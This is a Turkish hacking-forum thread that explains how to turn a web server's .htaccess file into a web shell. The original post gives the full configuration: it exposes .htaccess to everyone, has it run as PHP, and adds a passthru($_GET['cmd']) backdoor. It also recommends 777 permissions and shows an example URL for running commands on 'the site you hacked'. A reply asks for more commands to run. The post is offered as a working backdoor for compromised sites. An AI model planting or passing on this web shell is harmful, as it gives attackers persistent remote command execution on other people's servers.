.htaccessı Shell Gibi Kullanmak

tolizuga

Katılımcı Üye
22 Nis 2013
754
0
.htaccess Shell Gibi Kullanmak

Arkadaşlar servere girdiğimiz zaman public_html ye geçelim ve .htaccess bulalım.Bu dosyayı açalım ve altaki kodlar ekelyelim...

<Files ~ "^\.ht">
Order allow,deny
Allow from all
</Files>
AddType application/x-httpd-php .htaccess
# <?php passthru($_GET['cmd']); ?>


Bundan sonra dosyayı kaydedelim ve okuma izni verelim isterseniz 777 verin de tam olsun, bundan sonra komut kullanarak ulaşabilirsiniz örnek olarak :

http://www.sizinheyklediğinizsite.com/.htaccess?cmd=ls



NOT:ALINTIDIR
 

beyazlamer

Yeni üye
1 Eki 2013
28
0
sog olun başka ne tur komutlar kullanabiliriz. misalinizi deki komuttan başka komutlar ile bilgiyi genisletebilirmisiniz. Tesekkurler.
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.